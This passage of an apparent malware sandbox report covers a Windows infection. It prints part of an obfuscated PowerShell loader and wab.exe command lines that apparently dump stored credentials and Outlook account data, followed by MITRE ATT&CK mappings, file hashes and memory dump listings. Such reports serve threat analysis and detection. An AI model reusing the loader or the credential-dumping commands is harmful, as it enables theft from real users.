,i ,tReisneTasLe+Un+St%Fo$PeB.guB.sS,bWeo.uyR,.Rec,ooUnuRun ,tSh ') ;$Ischiovertebral=$Busboy[$Desilver];}$Fogedforbud=347549;$Keckling=28042;bagstagets (semisavage 'T,$T gLilB.o Kb Ba UlKo:.dGA r naSlpS,h oCosr c DoEjp ee.e ,o=Op SGcoeKntSa-.hC loOmn bt Ae Mn Nt . r$MoLF,aSkrMemYmsU, ');bagstagets (semisavage 'Gr$H gAflL.onibBeaCylKu:SegMekHos K Ut= . e[TaS ay.os atOveRkmSy.VaC,uoLbnByvReeC,rR,tJ,]A : E: MFspr loTamH BCia Hs reNi6 4 S otHerPoi unVrg a(S.$UdGSurC.aFapTrhMaoB sb cDioSkpT e D)S, ');bagstagets (semisavage 'Fl$Dig ulOro.obR.aMelFi:ooP naTelTolHyipraS.tChiS vSkeNal,tyD Fl=M, M,[TrS nySfsIntR,eMemV .RbT,aeAnxFrtBo.,nE DnAscMoo NdIdiP.n .gAn] i: U: .A,eS uCmaIUnI b.TiGZ e ht RSS.t Cr PiO,nFagSc( P$ArgRekResAn)Sm ');bagstagets (semisavage 'Am$.kg olL o ObVeaTelPh:t.K Lni,i HfShe SlCriPikHyeHa=af$PrPTaaTilTilLoiS aAlthaiOsv ae SlN.yPe.UnsD u bK.s.nt .rMiiNonHogS,(.o$ AFTro ,g eUrdsafE.oZurM.b Su dEx,Di$CoK teCacS.kUblAmi in PgFo) O ');bagstagets $Knifelike;"
        6⤵
        Blocklisted process makes network request
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4148
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posho.Sgs && echo t"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1952
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sjouvaf"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4848
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\cetmwtqkhz"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1488
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\egyxwdjmviclr"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac3bf9756600f6c31a15240716e6e7c6

SHA1
521aa76b55f74cafd1b579933dc0fae439acb0f5

SHA256
f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

SHA512
96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Trekanterne174.vbs

Filesize
23KB

MD5
1603bcb30077161d37f2977db50f5873

SHA1
43df53981fc58d99cea68279555b4dd98366ed87

SHA256
c658636d66ecbaf505b36ded0d6798240fc60b955a47b58473c9f28b4927b22a

SHA512
29d8ecd9fc3b7ddfa1d6d3296cc4cc3bdbcb970f68f0aa3ae8c439e23faa9ad92170cdd82af958d01335b2fb9a76ebe5e5a9e5a84c89fca0f5924c938b5fe263

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlymonoq.akf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sjouvaf

Filesize
4KB

MD5
15e28d82a9ee8a45c10bcf671fef0362

SHA1
2b126b086a1191cb8b4d444e87781358d51af3a4

SHA256
012fbb5f15d52a9560cf0e77fd36837ec2c56aff7a989d31c3d40d4f6df6cf9d

SHA512
3dd749523858a54e7e5ededba47d54715c9d5663dd0bd609363de7442436d1f0e924c5e4706e3ac413b79ddb6a18c796cc0ad166b4c87a3a7a6b009ba77fee82

Download Submit
C:\Users\Admin\AppData\Roaming\Proinquiry.Nul

Filesize
470KB

MD5
f281edfec822c81b42b6f27c0b83577f

SHA1
a0ec177606c5e3d4a03ca2e4467928154bd5b799

SHA256
4515af20d9dd633eba020c34280063ac55d22e6834ffa980bafebf47d3bcfb50

SHA512
9464d9a2a1aaf6348f2fd70b304c4fdb3aae95fa411b49121625f442ac4da5687f42cc8528040330de1f1a19285a7d051365133cf1919073fde0afba3859fe35

Download Submit
memory/1488-63-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1488-60-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1488-58-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2372-48-0x0000000001870000-0x000000000363A000-memory.dmp

Filesize
29.8MB

Download
memory/2372-75-0x000000001F850000-0x000000001F869000-memory.dmp

Filesize
100KB

Download
memory/2372-74-0x000000001F850000-0x000000001F869000-memory.dmp

Filesize
100KB

Download
memory/2372-71-0x000000001F850000-0x000000001F869000-memory.dmp

Filesize
100KB

Download
memory/3432-35-0x0000000005D60000-0x00000000060B4000-memory.dmp

Filesize
3.3MB

Download
memory/3432-44-0x0000000008960000-0x000000000A72A000-memory.dmp

Filesize
29.8MB

Download
memory/3432-37-0x0000000006430000-0x000000000647C000-memory.dmp

Filesize
304KB

Download
memory/3432-38-0x0000000007D30000-0x00000000083AA000-memory.dmp

Filesize
6.5MB

Download
memory/3432-39-0x0000000006900000-0x000000000691A000-memory.dmp

Filesize
104KB

Download
memory/3432-40-0x00000000076B0000-0x0000000007746000-memory.dmp

Filesize
600KB

Download
memory/3432-41-0x00000000075D0000-0x00000000075F2000-memory.dmp

Filesize
136KB

Download
memory/3432-42-0x00000000083B0000-0x0000000008954000-memory.dmp

Filesize
5.6MB

Download
memory/3432-21-0x0000000004DE0000-0x0000000004E16000-memory.dmp

Filesize
216KB

Download
memory/3432-36-0x0000000006390000-0x00000000063AE000-memory.dmp

Filesize
120KB

Download
memory/3432-22-0x0000000005490000-0x0000000005AB8000-memory.dmp

Filesize
6.2MB

Download
memory/3432-23-0x0000000005AF0000-0x0000000005B12000-memory.dmp

Filesize
136KB

Download
memory/3432-24-0x0000000005B90000-0x0000000005BF6000-memory.dmp

Filesize
408KB

Download
memory/3432-25-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/3616-62-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3616-61-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3616-59-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4148-90-0x0000000005820000-0x0000000005B74000-memory.dmp

Filesize
3.3MB

Download
memory/4148-92-0x0000000006240000-0x000000000628C000-memory.dmp

Filesize
304KB

Download
memory/4524-51-0x00007FFC72810000-0x00007FFC732D1000-memory.dmp

Filesize
10.8MB

Download
memory/4524-4-0x00007FFC72813000-0x00007FFC72815000-memory.dmp

Filesize
8KB

Download
memory/4524-15-0x00007FFC72810000-0x00007FFC732D1000-memory.dmp

Filesize
10.8MB

Download
memory/4524-16-0x00007FFC72810000-0x00007FFC732D1000-memory.dmp

Filesize
10.8MB

Download
memory/4524-18-0x00007FFC72810000-0x00007FFC732D1000-memory.dmp

Filesize
10.8MB

Download
memory/4524-14-0x000001FBF3A10000-0x000001FBF3A32000-memory.dmp

Filesize
136KB

Download
memory/4524-17-0x00007FFC72813000-0x00007FFC72815000-memory.dmp

Filesize
8KB

Download
memory/4848-64-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4848-65-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4848-57-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download